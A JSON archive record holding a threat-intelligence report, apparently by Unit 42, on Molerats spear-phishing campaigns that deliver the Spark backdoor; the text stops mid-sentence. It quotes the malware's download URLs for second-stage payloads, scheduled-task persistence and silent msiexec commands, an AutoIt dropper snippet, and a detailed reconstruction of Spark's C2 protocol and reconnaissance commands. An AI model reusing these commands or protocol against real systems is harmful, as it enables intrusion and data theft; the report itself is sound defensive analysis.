{
	"id": "d9f85440-d3a9-46cc-bfb1-0a5bbea1a5a8",
	"created_at": "2026-04-06T00:12:27.961917Z",
	"updated_at": "2026-04-10T13:12:21.116654Z",
	"deleted_at": null,
	"sha1_hash": "d2ca9f65335364294199311f865dacef8fe13520",
	"title": "Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3032429,
	"plain_text": "Molerats Delivers Spark Backdoor to Government and\r\nTelecommunications Organizations\r\nBy Robert Falcone, Bryan Lee, Alex Hinchliffe\r\nPublished: 2020-03-03 · Archived: 2026-04-05 14:08:09 UTC\r\nExecutive Summary\r\nBetween October 2019 through the beginning of December 2019, Unit 42 observed multiple instances of phishing attacks\r\nlikely related to a threat group known as Molerats (AKA Gaza Hackers Team and Gaza Cybergang) targeting eight\r\norganizations in six different countries in the government, telecommunications, insurance and retail industries, of which the\r\nlatter two were quite peculiar. The targeting of insurance and retail organizations is peculiar as it does not fit with this threat\r\ngroups prior target set. The email subject and attachment file names used in the attacks on these seemingly atypical targets\r\nwere similar in theme as those used when attacking government organizations. The lack of industry or target specific social\r\nengineering themes likely lowers the chances of a successful compromise and further confuses our understanding of the\r\npurpose of attacking these organizations.\r\nAll of the attacks involved spear-phishing emails to deliver malicious documents that required the recipient to carry out\r\nsome action. The social engineering techniques included lure images attempting to trick the user into enabling content to run\r\na macro and even document contents that threaten to release compromising pictures to the media to coerce the user into\r\nclicking a link to download a malicious payload. The payload in a majority of these attacks was a backdoor called Spark,\r\nwhich is a backdoor that allows the threat actors to open applications and run command line commands on the compromised\r\nsystem.\r\nThe Spark backdoor has been used by Molerats since at least 2017 and is associated with the Operation Parliament\r\ncampaign, which is attributed to the Gaza Cybergang. 
The payload delivered in one of the attacks appears to be related to\r\nJhoneRAT, which may suggest the threat group has added another custom payload to their toolset.\r\nMolerats has been in operation as far back as 2011 targeting government organizations around the world, largely been\r\nassociated with attacks involving unauthorized access and sensitive data collection.They have been observed using a bevy of\r\ntactics and techniques, ranging from leveraging publicly available backdoor tools, such as PoisonIvy or XtremeRAT, to\r\ncreating custom developed ones such as KASPERAGENT and MICROPSIA. In the campaign that we tracked, this group\r\nprimarily relied on social engineering and spear-phishing techniques for their initial infection vector, then multi-stage\r\ncommand-and-control (C2) servers for malware delivery.\r\nMolerats used a variety of techniques to make detection and analysis difficult, such as password-protecting delivery\r\ndocuments, limiting the execution of the Spark payload to only run on systems with an Arabic keyboard and locale and the\r\nuse of the commercial packer Enigma to obfuscate the payloads. The Spark C2 channel also attempts to evade detection, as\r\nthe data in the HTTP POST requests and responses is encrypted using either 3DES or AES with randomly generated keys\r\nthat appear to be unique for each payload.\r\nStarting Point\r\nIn November 2019, Unit 42 was made aware of a single phishing email directed at a Saudi Arabian government\r\norganization. This attack involved a password-protected Microsoft Word document, which contained an embedded macro.\r\nThe password for the document was provided to the victim in the body of the email. 
From the artifacts discovered in this\r\nattack, we were able to use our AutoFocus product to pivot to additional attacks and uncover what turned out to be an attack\r\ncampaign by Molerats.\r\nUsing our AutoFocus tool, we were able to find several attacks sent from the actors starting on October 2 through December\r\n9, 2019. The emails were sent to organizations in the government and telecommunications verticals and had a mixture of\r\nspecific and generic email subjects and attachment filenames. We also saw sessions associated with this attack campaign\r\ninvolving two US-based organizations, one in the retail and the other in the insurance industry.\r\nThe files attached to these emails were all documents, with the majority being Word documents and one PDF document.\r\nTable 1 shows a list of the emails used in this attack campaign, including the details of the email and the country and\r\nindustry of the targeted organization. In this blog, we will provide an analysis of three of the seven delivery documents listed\r\nin Table 1, as the four unique delivery documents with MOFA in their file names are extremely similar to each other. The\r\nlast delivery document (‘Urgent.docx’) was the delivery document discussed in Cisco Talos' research on a new payload\r\ncalled JhoneRAT, which may suggest that this group also uses JhoneRAT in their attack campaigns in the region.\r\nDate Subject Attachment SHA256 Country Industry\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 1 of 21\n\n10/2/2019 MOFA reports 03-10-2019\r\nMOFA-031019.doc\r\nd19104ef4f443e8.. AE Gov\r\n10/3/2019 03-10-2019\r\nMOFA-031019.doc\r\nd19104ef4f443e8.. UK,ES Gov\r\n10/5/2019 06-10-2019\r\nMOFA-061019.doc\r\n03be1d7e1071b01.. AE Gov\r\n10/10/2019 MOFA Reports\r\nMOFA-101019.doc\r\n011ba7f9b4c508f..\r\nddf938508618ff7..\r\nUS Insurance,Retail\r\n10/31/2019\r\nلعناية معاليكم - المرفق -10-31\r\n2019\r\nattachment.doc eaf2ba0d78c0fda.. 
DJ Telecom\r\n11/2/2019\r\nلعناية معاليكم - المرفق -10-31\r\n2019\r\nattachment.doc eaf2ba0d78c0fda.. DJ Telecom\r\n11/18/2019\r\nصورك\r\n\u003credacted\u003e\r\nمع هبة\r\nPictures.pdf 9d6ce7c585609b8.. ES Gov\r\n11/24/2019\r\nمخطط الجهاد االسالمي لمباغتة\r\nاسرائيل وضرب التهدئة\r\nUrgent.docx 273aa20c4857d98.. DJ Telecom\r\n12/9/2019\r\nمحضر اجتماع قيادة المخابرات\r\nالعامة مع وفد حركة حماس -09\r\n2019-12\r\nUrgent.docx 273aa20c4857d98.. DJ Telecom\r\nTable 1. Details of spear-phishing emails seen in this attack campaign\r\nMOFA Delivery Document\r\nThe first document we collected and analyzed had the filename MOFA- 061019.doc (SHA256:\r\n03be1d7e1071b018d3fbc6496788fd7234b0bb6d3614bec5b482f3bf95aeb506). This document was password-protected with\r\nthe password Abdullah@2019. When opening and supplying the password, the victim was presented with contents that\r\ninclude what appears missing images, as seen in Figure 1.\r\nFigure 1. Lure image in MOFA delivery document\r\nOnce the victim then enabled the embedded macro inside the document, the macro decodes an embedded VBScript (T1064)\r\nand saves it to C:\\programdata\\Micorsoft\\Microsoft.vbs. The Microsoft.vbs script will reach out to the C2 domain\r\nservicebios[.]com to retrieve a second VBScript, which contained additional instructions to then retrieve the payload. 
The\r\nscript downloads this secondary VBScript from the following URL and saves it to C:\\ProgramData\\PlayerVLC.vbs:\r\nhttps://servicebios[.]com/PlayerVLC.vbs\r\nThe initial VBScript will then create a scheduled task (T1053) to persistently run the secondary VBScript every minute by\r\nrunning the following command:\r\nschtasks /create /sc minute /mo 1 /tn PlayerVLC /F /tr C:\\ProgramData\\PlayerVLC.vbs\r\nThe secondary VBScript attempts to download the executable payload from the following URL and saves it to\r\nC:\\ProgramData\\PlayerVLC.msi.\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 2 of 21\n\nhttps://servicebios[.]com/PlayerVLC.msi\r\nAfter downloading the executable payload, the secondary VBScript runs the following command on the command line\r\n(T1059) to kill any existing msiexec.exe process instances and use the ping application to sleep for two seconds before using\r\nthe legitimate msiexec.exe application (T1218) to launch the downloaded PlayerVLC.msi file:\r\n%comspec% /c taskkill /F /IM msiexec.exe \u0026 ping 127.0.0.1 -n 2 \u003eNUL \u0026 msiexec /i C:\\ProgramData\\PlayerVLC.msi\r\n/quiet /qn /norestart\r\nUnfortunately, we were unable to obtain the PlayerVLC.msi file, as it was no longer hosted by the C2 server. This highlights\r\nthe benefits of a modular payload that requires a chain of successful communications with a C2 server for a successful\r\ninfection, as it makes post-intrusion analysis difficult. This type of modular payload and chained C2 requests is fairly\r\ncommon, as we have seen it in use by various adversaries such as DarkHydrus and Sofacy. 
This behavior can assist the\r\nadversary in evading automated defenses, as they can deploy their infrastructure at time of attack and avoid having\r\nadditional artifacts available for further analysis.\r\nAttachment Delivery Document\r\nThe Word document delivered on October 31 and November 2, 2019 (SHA256:\r\neaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000) had a filename of attachment.doc and attempted\r\nto trick the recipient into clicking the “Enable Content” button to run an embedded macro. Figure 2 shows the lure image\r\nused in an attempt to trick the recipient into clicking the “Enable Content” button. These documents were not password-protected, unlike the MOFA delivery documents previously discussed.\r\nFigure 2. Lure image in Attachment delivery document\r\nThe macro is quite simple, as it attempts to download a base64 encoded executable from the following Google Drive URL\r\nthat it will decode and save to %TEMP%\\rundll64.exe:\r\nhxxps://drive.google[.]com/uc?export=download\u0026id=1yiDnuLRfQTBdak6S8gKnJLEzMk3yvepH\r\nThe decoded executable (SHA256: 7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128P) is a\r\ncompiled AutoIt script that installs an embedded executable to %userprofile%\\runawy.exe and runs it. Before exiting, the\r\nAutoIt script also makes sure the executable will persistently run by copying the executable to the startup directory and by\r\ncreating a scheduled task by running the following command:\r\nSCHTASKS /Create /f /SC minute /TN \"runawy\" /mo 5 /tr \"%userprofile%\\runawy.exe\"\r\nThe runawy.exe file (SHA256:64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431) is a payload\r\npacked with Enigma that creates a mutex of “S4.4P”. This payload is a packed variant of the Spark backdoor, which has\r\nbeen exclusively linked to Molerats. 
We will discuss the Spark backdoor’s functionality in detail later in this blog, but this\r\nspecific sample has the following configuration:\r\n{\"sIt\":\"nysura[.]com\",\"QrU\":\"/\",\"JJDF\":80,\"MJOu\":0,\"TuS\":\"\",\"pJhC\":1,\"Lm\":\"NMRm3AlaGUeT2g9iA2lNTIk04vSj8r2IBUDEvItgOxw=\",\"LPO\":1000\r\nPictures PDF Delivery Document\r\nUnlike the prior two Word documents discussed, we observed a PDF document named “Pictures.pdf”\r\n(SHA256:9d6ce7c585609b8b23703617ef9d480c1cfe0f3bf6f57e178773823b8bf86495) attached to an email with a subject\r\nof صورك\u003e redacted\u003e هبة مع, which roughly translates from Arabic to “Your filthy pictures with Heba”. The PDF document\r\ndoes not attempt to exploit a vulnerability, rather it contains a message meant to coerce the recipient into clicking a link to\r\ninstall the actor’s payload. Also, unlike the Word delivery documents that used finesse lure images and missing content in an\r\nattempt to trick the user into enabling macros, this PDF document uses a more brash approach that contained a blackmail-esque message in an attempt to trick the user into clicking a link, opening a RAR archive and running an executable.\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 3 of 21\n\nThe message within the PDF document is in Arabic and suggests the sender has compromising pictures of the recipient that\r\nthey will release to the media. The message also suggests the document was sent to an associate of a government official and\r\nwas meant to threaten the victim into clicking a link within the document. Figure 3 shows the contents within the PDF\r\ndocument.\r\nFigure 3. Screenshot of the contents of the malicious PDF document\r\nThe link within the document is in Arabic and roughly translates to “A small sample of your filthy pictures with Heba” and\r\n“Pictures”. 
The link points to the following URL, which is case sensitive:\r\nhxxps://zmartco[.]com/Pictures.rar\r\nThe \"Pictures.rar\" file (SHA256: 1742caf26d41641925d109caa5b4ebe30cda274077fbc68762109155d3e0b0da) is a RAR\r\narchive that contains one file with a filename of الصور من قليلة عينة هذه.exe (SHA256:\r\n92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7), which roughly translates to \"This is a few\r\nsample photos.exe\". The executable is a compiled AutoIt script that extracts an embedded executable, saves it to disk at\r\nC:\\Users\\Public\\pdf.exe (SHA256: 5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3) and\r\ncreates a shortcut in Start Menu\\Programs\\Startup\\pdf.lnk to automatically start it each time the system starts, as seen here:\r\n#NoTrayIcon\r\nFileInstall(\"pdf.exe\", \"C:\\Users\\Public\\\" \u0026 \"/pdf.exe\")\r\n$cmd1 = \"C:\\Users\\Public\\\" \u0026 \"\\pdf.exe\"\r\nRunWait(@ComSpec \u0026 \" /c start \" \u0026 $cmd1, \"\", @SW_HIDE)\r\nFileCreateShortcut(\"C:\\Users\\Public\\\" \u0026 \"\\pdf.exe\", @StartupDir \u0026\r\n\"\\pdf.lnk\")\r\nLike the “runawy.exe” payload delivered by the attachment.doc Word document, the \"pdf.exe\" file saved to the system is a\r\npacked variant of the Spark backdoor. This variant of the backdoor had the following configuration:\r\n{\"xBql\":\"laceibagrafica[.]com\",\"eauy\":\"/\",\"Qnd\":80,\"jJN\":0,\"rlOa\":\"\",\"Eb\":1,\"BGa\":\"vcJbq6nzgJk=\",\"qJk\":10000}\r\nDelivery Infrastructure\r\nOften when investigating attacks like these, links between infrastructure used across distinct campaigns can be easily found,\r\nsuch as by tracking reused IP addresses or domains, finding related domains sharing similar attributes, and so on. 
In the case\r\nof all the MOFA-related delivery documents listed in Table 1, servicebios[.]com was the only domain used, and most of the\r\ninfrastructure information related to historical usage.\r\nWith the AutoFocus Threat Intelligence service, we used alternative data points provided from our cloud sandbox, WildFire,\r\nduring the analysis of said malicious documents in order to pivot and discover additional samples and related infrastructure.\r\nIn this section we will discuss the methods we used and describe the additional infrastructure.\r\nFigure 4 below is a maltego chart showing the Word documents and Visual Basic Script (vbs) files related to the\r\nservicebios[.]com domain in the bottom half of the chart, with some of the related entities connected via one of two links, to\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 4 of 21\n\nother entities in the top half of the chart. Said links include Yara signatures in the blue box and an AutoFocus query in the\r\norange box, as indicated by the “AF” for AutoFocus.\r\nFigure 4. Chart showing relationships between delivery documents and associated infrastructure\r\nThe AutoFocus query relates to a specific process execution chain leading to a Windows Scripting Host process\r\n(wscript.exe) launching the malicious VBS downloader scripts. 
This allowed us to pivot on behavioural artefacts from the\r\n“MOFA- 101019.doc” (SHA256: ddf938508618ff7f147b3f7c2b706968cace33819e422fe1daae78bc256f75a8) document to\r\npreviously unknown documents “2019 - 9 - 9 - ليوم الفلسطينية المستجدات أهم حول اليومي التقرير.doc” (Daily report on the most\r\nimportant Palestinian developments, 9-9-2019.doc; SHA256:\r\nfeec28c7c19a8d0ebdca8fcfc0415ae79ef08362bd72304a99eeea55c8871e21) and “-العالمي اإلرهاب مستجدات أخر حول اليومي التقرير\r\n2019 - 9 - 9.doc” (Daily updates on the latest terrorism report Alaalmi- 9 - 9 - 2019.doc; SHA256:\r\nbf126c2c8f7d4263c78f4b97857912a3c1e87c73fee3f18095d58ef5053f2959).\r\nAs with the original Word document, the VBA macro code inside the new documents also used the open-source code\r\n“Base64 decode VBS function” from Motobit to decode (T1027) the download function and URL to VBS before running it.\r\nThe main difference between the VBS files is the domain - dapoerwedding[.]com - where the secondary VBS payload was\r\nhosted. At the time of this activity the domain resolved to 45.15.168[.]118 and was used in a previous campaign from\r\nSeptember 2019.\r\nIn parallel to searching for related files using behavioural commonalities, we authored Yara signatures for the VBS code\r\nassociated with the original delivery document, to scan our and VirusTotal’s corpus. 
This led to two additional VBS files:\r\nSHA256: 85631021d7e84dc466b23cf77dd949ebc61011a52c1f0fb046cfd62dd9192a15 represents the 1st stage VBS\r\ndownloader containing minor changes to the domain and filename used, as follows:\r\nhttps://dapoerwedding[.]com/GoogleChrome.vbs\r\nThe second VBS file discovered (SHA256: 9451a110f75cbc3b66af5acb11a07a8d5e20e15e5487292722e695678272bca7) is\r\nthe 2nd stage VBS downloader with reference to the final MSI file payload, which was unavailable at the time of writing:\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 5 of 21\n\nhttps://dapoerwedding[.]com/GoogleChrome.msi\r\nWe were also able to discover additional Word documents using other AutoFocus queries, as highlighted by the two other\r\nAutoFocus “AF'' orange boxes in Figure X above. These maltego entities query our data using proprietary hashes calculated\r\nfrom the original document’s VBA macro code, and resulted in SHA256:\r\n602828399e24dca9259a4fc4c26f07408d1e0a638c015109c6c84986dc442ebb (servicebios[.]com), and SHA256s:\r\na2c68da1b3e0115f5804a55768b2baf50faea81f13a16e563411754dc6c0a8ff and\r\n4f51b180a6d0b074778d055580788dc33c9e1fd2e49f3c9a19793245a8671cba (dapoerwedding[.]com).\r\nUpon initial inspection of dapoerwedding[.]com and servicebios[.]com, nothing stood out as having ties to previously\r\ndocumented Molerats activity, however there were some commonalities (T1347) between the two domains:\r\n1. Pre-existing domains\r\n2. Seemingly legitimate historical content\r\n3. Recently expired (and lapsed domain redemption grace period)\r\n4. Post-expiry registrant (T1328) is NameCheap, Inc.\r\n5. 
Domain Validation (DV) SSL Certificates setup (T1337), issued by Sectigo\r\nAnother delivery domain - zmartco[.]com - that shares the same commonalities listed above pertains to the “Pictures.pdf”\r\ndelivery attachment listed in Table 1 discussed in the previous section.\r\nSpark Payload Related to Operation Parliament\r\nThe executables installed by the compiled AutoIt scripts is a backdoor that Molerats has used in many attack campaigns.\r\nUntil recently, this backdoor did not have its own moniker, but Cybereason recently gave this backdoor a name of “Spark”.\r\nAs mentioned in Cybereason’s blog, the Spark backdoor was also delivered in attacks occurring in January 2019, as\r\ndiscussed in a blog published by Qihoo 360. Based on our research, the Spark backdoor has been used by Molerats since at\r\nleast early 2017, as it was the main payload in the Operation Parliament campaign reported by Kaspersky.\r\nSpark uses HTTP POST requests to communicate with its C2 server to receive commands and to exfiltrate the results, all of\r\nwhich using JSON-structured messages. In most cases, the threat actors use commercial packers to obfuscate the Spark\r\npayload to avoid detection. During our research, we have seen the actors use the Enigma protector, Themida and VMProtect,\r\nwhich makes identifying samples difficult. We were also able to identify two different versions of Spark-based identifiers\r\nleft in the binaries by the developer, which are version 2.2 and 4.2. Based on the compilation times of the files with the\r\nSpark samples with identifiable version strings, it appears that version 2.2 was created in 2017, while version 4.2 was\r\ncreated in late December 2019 and January 2020. Table 2 shows these Spark samples that contained version numbers, along\r\nwith their compile time and the packer used to obfuscate their contents.\r\nTruncated SHA256 Version Compiled Packer\r\n966ad6452793b15.. 2.2 2017-05-24 6:15:04 VMProtect\r\nab4e43b4e526d44.. 
2.2 2017-05-24 6:15:04 VMProtect\r\n212aa6e3f236550.. 2.2 2017-05-24 6:15:04 VMProtect\r\ncf32479ed30ae95.. 4.2 2019-12-30 9:45:44 none\r\nd0dc1de0ae912c7.. 4.2 2020-01-12 10:57:50 Enigma\r\n04fa6aaea5e3a26.. 4.2 2020-01-12 10:57:50 Enigma\r\n6e60f5c65299ee7.. 4.2 2020-01-12 10:57:50 Enigma\r\nb08b8fddb9dd940.. 4.2 2020-01-12 10:57:50 Enigma\r\n64ea1f1e0352f3d.. 4.2 2020-01-12 10:57:50 Enigma\r\nTable 2. Spark samples with their version number, compile time and the packer used\r\nWe have collected dozens of Spark payloads, whose compile times range from March 2017 to January 2020, which further\r\nsuggests this group has been using this backdoor in attack campaigns for almost three years. We extracted the configurations\r\nfrom each of these files to gather the known C2 domains associated with Spark, which we have included in Table 3.\r\nDomain First used\r\nwebtutorialz[.]com 1st Half 2020\r\nnysura[.]com 1st Half 2020\r\nlaceibagrafica[.]com 2nd Half 2019\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 6 of 21\n\nmotoqu[.]com 2nd Half 2019\r\nsmartweb9[.]com 1st Half 2019\r\nlaptower[.]com 2nd Half 2018\r\napp.msexchanges16[.]com 2nd Half 2018\r\nmsexchange13[.]com 2nd Half 2018\r\ncloudserviceapi[.]online 2nd Half 2018\r\nupdates.masterservices[.]online 2nd Half 2018\r\nclients.itresolver[.]online 1st Half 2018\r\nupdate.itresolver[.]online 1st Half 2018\r\n91.219.237[.]99 2nd Half 2017\r\ngoldenlines[.]site 2nd Half 2017\r\nupdate.nextdata[.]site 2nd Half 2017\r\nTable 3. Spark C2 domains and the approximate time they were used\r\nIn the next section, we will explain Spark’s capabilities and demonstrate its C2 channel that we determined from our\r\nanalysis of the “pdf.exe” payload delivered by the Pictures.pdf document in the November 2019 attack.\r\nSpark Payload in Pictures.pdf November 2019 Attack\r\nThe Spark payload installed by the compiled AutoIt script is packed with the commercial Enigma protector (T1045). 
When\r\npacking the payload, the actor used a feature within Enigma protector called “Splash Screen”, which the actor configured to\r\ndisplay an image on top of all the windows and waits for the user to click the image before executing the malicious code.\r\nFigure 5 shows the splash image displayed by the Enigma protector prior to executing the malicious payload, which is a\r\nwallpaper image available at wallpaperswide.com. The splash screen feature acts as a sandbox evasion technique, as it\r\nrequires user interaction in the form of clicking the screen before the malicious code runs.\r\nFigure 5. Screenshot of the contents of the malicious PDF document\r\nOnce unpacked, we found the Spark payload was similar to the payloads delivered in Operation Parliament from a capability\r\nperspective. The Spark payload is a backdoor that allows the threat actors to open applications and run command line\r\ncommands on the compromised system.\r\nThe payload starts by checking the results of the GetKeyboardLayoutList and the language name returned by\r\nGetLocaleInfoA to make sure they contain the word \"arabic\". If the word is not found in the results of these two API calls,\r\nthe payload does not execute any of its malicious code. Checking for specific keyboards and languages is a known evasion\r\ntactic meant to avoid running on analysis systems not configured, as the actor’s targeted victim would be configured.\r\nAfter the payload confirms that the system has the appropriate keyboard and language pack installed for the actor’s desired\r\ntarget, it will begin attempting to communicate with a C2 server specified within a configuration embedded within the\r\npayload. The embedded configuration is encrypted and the payload decrypts it by first using a custom rolling XOR\r\nalgorithm to decrypt a key and a buffer of ciphertext, resulting in a key and ciphertext that appears encoded with base64. 
It\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 7 of 21\n\nwill then generate the SHA256 hash of the base64 encoded key and use the fourth through the 28th bytes of the resulting\r\nhash as the final key. The payload will base64 decode the ciphertext and use the final key to decrypt the decoded ciphertext\r\nusing Triple DES (3DES), which results in a configuration that is structured in JSON. This particular payload had the keys\r\nand values seen in Table 3 below.\r\nJSON\r\nField\r\nJSON Value Description\r\nxBql laceibagrafica[.]com Hostname of C2 server\r\neauy / URI of C2 server\r\nQnd 80 TCP port for C2 server\r\njJN 0 Sleep interval before entering the main C2 communications loop.\r\nrlOa \u003cempty string\u003e Unknown and does not appear to be used.\r\nEb 1 Unknown purpose, but sent to the C2 in the BrandentlK field\r\nBGa vcJbq6nzgJk=\r\nHardcoded base64 encrypted string, which is the “Nickname” field likely used as\r\na campaign identifier\r\nqJk 10000\r\nNumber of iterations of the main C2 communications loop before exiting the\r\napplication.\r\nTable 3. JSON key/value pairs within the payload’s configuration\r\nThe payload also uses this same routine to decrypt an encrypted buffer that contains sleep intervals and more importantly a\r\nlist of first names used to structure the messages sent to and from the C2 server, as well as the keys used to decrypt these\r\nmessages. The payload will use the first names listed in Table 4 as JSON key names and values within messages sent to and\r\nreceived from the C2. We provide a description of each element of this decrypted buffer in the Appendix, but also show how\r\nthe names in Table 4 are used within the C2 communications later in this blog. 
Each of the values in Table 4 are unique per\r\nSpark sample, as the developer changes the names and the keys for each payload.\r\nLawrence Alanih Nevaeh Garrison ReeceWNM\r\nAllier Averizt LondonzO Zeke MorganE\r\nJaseN MathiasNbo JoslynKe ReesefP Winston\r\nIvory BrandentlK AngelxEv FrederickT Jessicay\r\nJonas AdalynngS ZaydenlnL KaileeXws VanessaFM\r\nReginacy AdelineRD Houstonod EverlyY Jordanlzw\r\nTrumanRd CollinsPM Maximiliano CallieVK Aryana\r\nTable 4. First names used by Spark as JSON key/value pairs used for C2 communications\r\nBefore communicating with the C2 server, the payload will decrypt one more buffer that contains strings that the payload\r\nuses for debugging messages, as well as the commands it will use to gather system information. Table 5 shows the strings\r\ndecrypted and their purpose.\r\nDecrypted String\r\n1\r\n311OEVZihfReZStoFf4cfg==\r\nZ9Q1WVryAIzLVSxF1yWRwg==\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 8 of 21\n\nP5K5He/2wSGGsvrFPKYpwg4KjBLyTOpbsGJwm1DckoyGK8eXeNMZCQBfHzkYRSjJlGcw6Ckn41X0MY3zJcU65uMvxpABv/g+ttABRJsG7js=\r\nAykC+x26hhd5DfrB/yly9gXcFsIlVxO9\r\nok\r\nCreate Pipe Error\r\nCreate processa error\r\nGet exit code process error\r\n0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$%^\u0026*()_+\r\nSet handle information error\r\nWait for single object error\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 9 of 21\n\nTable 5. JSON key/value pairs within a buffer that the payload uses to communicate with C2 server\r\nSpark C2 Communications\r\nThe payload communicates with its C2 server laceibagrafica[.]com by issuing HTTP POST requests with base64 encoded\r\nand encrypted messages in the data section. We had not seen any previous explanation of this C2 channel, so we will provide\r\nan overview of the back and forth communications between the payload and C2 server to show how this payload uses the\r\nnames in Table 4. 
To do this analysis, we created a C2 server to interact with the Spark payload to issue commands, so all of\r\nthe HTTP responses in this section are from the C2 server we created and not an actor developed C2 software. Figure 6\r\nshows an initial beacon sent from the payload to its C2 server. However, all of the outbound requests from the payload to the\r\nC2 will look similar visually, as they all use HTTP POST requests to the same URL with encoded and encrypted messages.\r\nFigure 6.Initial beacon sent from payload to C2 server\r\nThe data section in the initial beacon decodes and decrypts to the JSON message\r\n{\"CallieVK\":\"W10=\",\"ReeceWNM\":\"Jessicay\"}. The JSON message involves two key/value pairs with keys “ReeceWNM”\r\nand “CallieVK”, whose values transmit the communication type and the data, respectfully. For instance, the “ReeceWNM”\r\nkey includes the name “Jessicay” that is used to represent the initial beacon communication type. The payload will decrypt\r\nthe C2 servers’ response looking for a “EverlyY” field and uses the value for a sleep interval before continuing. Figure 7\r\nshows a response from the C2 server to the initial beacon, of which the response decrypts to {\"EverlyY\": 0}.\r\nFigure 7. Initial beacon sent from payload to C2 server\r\nAfter receiving the EverlyY response, the payload will gather system information, specifically the username, hostname and\r\nthe system specific UUID by running the following command line commands using ‘cmd.exe’:\r\n1. wmic csproduct get UUID | more +1 | cmd /q /v:on /c \"set/p .=\u0026echo(!.!\"\r\n2. hostname\r\n3. echo %username%\r\nThe payload will store each of these command results in JSON in base64 encoded ciphertext within a field name\r\n“ZaydenlnL” and using the first name “AngelxEv” to represent the type of data, which is a number that corresponds to the\r\nresults in the list above with 1 representing the UUID, 2 the hostname and 3 the username. 
These three JSON objects are\r\nadded to a JSON array with a name of “Maximiliano” and sent to the C2 server. For example, the payload stores the system\r\ninformation in JSON as follows:\r\n{\"Maximiliano\":[{\"AngelxEv\":1,\"Houstonod\":1,\"ZaydenlnL\":\"\u003cbase64 encoded ciphertext of UUID\u003e\"},\r\n{\"AngelxEv\":3,\"Houstonod\":1,\"ZaydenlnL\":\"\u003cbase64 encoded ciphertext of username\u003e\"},\r\n{\"AngelxEv\":2,\"Houstonod\":1,\"ZaydenlnL\":\"\u003cbase64 encoded ciphertext of hostname\u003e\"}]}\r\nThe payload will create an outbound communications JSON object by setting the encoded system information JSON to the\r\n“CallieVK” value and setting the “ReeceWNM” value to the communication type “JoslynKe”. The resulting JSON will\r\nresemble the following:\r\n{\"CallieVK\":\"\u003cbase64 encoded ciphertext of system information “Maximiliano” JSON array\u003e\",\"ReeceWNM\":\"JoslynKe\"}\r\nThe resulting JSON object is base64 encoded, encrypted and sent within the HTTP POST data to the C2 server, as seen in\r\nthe example request in Figure 8.\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 10 of 21\n\nFigure 8. System information sent from payload to C2 server\r\nAfter sending the system information, the payload will expect to receive a command from the C2 server within the response.\r\nFigure 9 shows the response to this request that contains encrypted data that the payload will parse for commands to\r\nexecute.\r\nFigure 9. C2 server response containing ciphertext containing a command line command to execute\r\nThe payload does not have a command handler. Rather, it will process the JSON object within the C2’s response for\r\napplications to open and/or command line commands to run by calling the CreateProcessW API function. 
The expected\r\nJSON object contains an array named “Jordanlzw” that has one or more objects that will have a task identifier number in a\r\nfield “Ivory”, an application name to run in an “Alanih” field, and the command line arguments to pass to the application in a\r\n“TrumanRd” field. For instance, the decrypted response in Figure 9 contains a JSON object that would instruct the payload to\r\nrun “c:\\windows\\system32\\cmd.exe” using the command line argument “/c whoami”, which effectively runs the “whoami”\r\ncommand:\r\n{\"Aryana\": 0, \"Jordanlzw\" :[{\"Ivory\" : 5, \"Jonas\" : true, \"Reginacy\" : false, \"TrumanRd\" :\r\n\"/NKg0zJdCDP1XlK9NJ4eJA==\", \"Alanih\" : \"i8KOnxchf86h8NKfF45XMETHhwTx6yF3AfMoWzyG9wA=\",\r\n\"LondonzO\" : true}]}\r\nAfter running the command provided by the C2, the payload will send a message to the C2 server that we believe is meant to\r\nnotify the C2 that it received the command by sending the specific task identifier to the server. The payload will notify the\r\nC2 using the communication type \"MorganE\" as seen in the following JSON:\r\n{\"CallieVK\":\"eyJKYXNlTiI6W3siTGF3cmVuY2UiOjV9XX0=\",\"ReeceWNM\":\"MorganE\"}\r\nThe decoded data within the “CallieVK” field will contain a JSON array with a name of “JaseN” that contains one or more\r\nobjects with a field name of “Lawrence” that contains the task numbers received, such as {\"JaseN\":[{\"Lawrence\":5}]}. This\r\nacknowledgement is sent to the C2 server, as seen in Figure 10:\r\nFigure 10. Payload notifying the C2 server that it received the command\r\nAfter acknowledging the receipt of the command, the payload expects the C2 to respond with a JSON object with the “Allier”\r\nfield set to a number, such as {\"Allier\" : 7}. 
We are unsure of the purpose of this transmission or how the payload uses this\r\nnumber value, but Figure 11 shows the base64 encoded ciphertext containing the “Allier” field.\r\nFigure 11. C2 server providing the Allier JSON object\r\nAfter receiving the “Allier” JSON object, the payload will send the results of the executed command(s) to the C2 server. The\r\npayload will create a JSON object with an array named “Zeke”, which will contain JSON objects that have a “FrederickT”\r\nfield used to store the result of the command, a “ReesefP” field to denote the task identifier, and a “KaileeXws” field to store\r\na boolean indicating whether the command was successful. The resulting JSON would look like the following when the result of the\r\n‘whoami’ command issued by the C2 is “test-system\\\u003credacted\u003e”:\r\n{\"Zeke\":[{\"FrederickT\":\"5yUu16Ae8WKt\u003credacted\u003e\",\"KaileeXws\":true,\"ReesefP\":5}]}\r\nThe payload will base64 encode this data and set the “CallieVK” field in the outbound JSON object with the “ReeceWNM”\r\nfield set to the “Winston” communication type, as seen in the 